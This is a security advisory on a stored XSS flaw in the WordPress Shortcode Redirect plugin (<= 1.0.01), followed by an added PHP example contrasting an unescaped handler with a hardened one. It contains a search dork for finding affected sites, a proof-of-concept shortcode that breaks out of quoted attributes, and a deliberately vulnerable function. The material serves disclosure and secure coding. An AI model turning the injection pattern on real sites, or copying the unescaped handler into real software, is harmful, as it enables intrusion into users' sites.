WordPress Shortcode Redirect 1.0.01 Stored Cross Site Scripting

2012-01-21T00:00:00
ID PACKETSTORM:108914
Type packetstorm
Reporter Gianluca Brindisi
Modified 2012-01-21T00:00:00

Description

                                        
`# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/  
# Date: 2012/01/18   
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)  
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip  
# Version: 1.0.01  
  
1) You need permissions to write a post (HTML mode) to exploit the shortcode:  
  
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']  
  
`
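
The `"` in the PoC attributes implies that `url` and `sec` are written into a quoted HTML attribute without validation or encoding. The PHP below is an added example, not the plugin's source or the reporter's code: it contrasts a hypothetical unescaped handler with a hardened one. The function names, the meta-refresh output shape and the 3600-second cap are assumptions.

```php
<?php
// Hypothetical handlers for illustration; not the plugin's source.
// Assumption: the values land in a double-quoted HTML attribute
// (a meta refresh here), which the '"' in the PoC would close early.

// Vulnerable shape: attribute values concatenated into markup as-is.
function redirect_vulnerable(array $atts): string {
    return '<meta http-equiv="refresh" content="' . $atts['sec']
         . ';url=' . $atts['url'] . '">';
}

// Hardened shape: validate each value by type, then encode for the sink.
// In a WordPress plugin, absint(), esc_url() and esc_attr() cover the same roles.
function redirect_hardened(array $atts): string {
    // sec: whole number of seconds in a bounded range, else fall back to 0.
    $sec = filter_var($atts['sec'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 3600]]);
    if ($sec === false) {
        $sec = 0;
    }

    // url: absolute http(s) only, no quotes, angle brackets, spaces or controls.
    $url    = (string) ($atts['url'] ?? '');
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $host   = (string) parse_url($url, PHP_URL_HOST);
    if (!in_array($scheme, ['http', 'https'], true) || $host === ''
        || preg_match('/["\'<>\s\x00-\x1f]/', $url)) {
        return ''; // refuse to render instead of emitting a repaired value
    }

    // Encode at output even after validation.
    return '<meta http-equiv="refresh" content="' . $sec . ';url='
         . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed inputs: the advisory's attribute values and a benign pair.
$poc = ['url' => 'http://wherever.com"[XSS]', 'sec' => '500"[XSS]'];
$ok  = ['url' => 'http://wherever.com/', 'sec' => '5'];

echo redirect_vulnerable($poc), "\n";
var_dump(redirect_hardened($poc) === '');
echo redirect_hardened($ok), "\n";
```

Because the payload is stored in post content, the check belongs at render time in the shortcode handler, so posts saved before a fix are covered as well.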